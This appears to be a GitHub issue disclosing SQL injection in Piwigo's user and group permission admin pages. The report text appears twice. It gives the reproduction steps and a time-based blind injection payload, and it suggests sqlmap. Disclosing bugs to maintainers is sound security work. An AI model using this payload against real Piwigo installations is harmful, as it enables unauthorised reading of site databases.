hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php
1 :
request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
2:
same as the first, request /admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload: 1 and if(ascii(substr(database(),1,1))>97,1,sleep(5)) or use 'sqlmap'
The text was updated successfully, but these errors were encountered:
plegall
changed the title
Piwigo v2.9.5 - SQL injection in admin/user_perm.php and admin/group_perm.php
SQL injection in user/group permissions manager
Aug 12, 2019
hi, I found two new vulnerabilities in admin/user_perm.php and admin/group_perm.php
1 :




request http://xx.xx.xx.xx/admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload:
1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))or use 'sqlmap'2:




same as the first, request /admin.php?page=user_perm&user_id=1 /Need to have a private album
then move the album from the right to the left
payload:
1 and if(ascii(substr(database(),1,1))>97,1,sleep(5))or use 'sqlmap'The text was updated successfully, but these errors were encountered: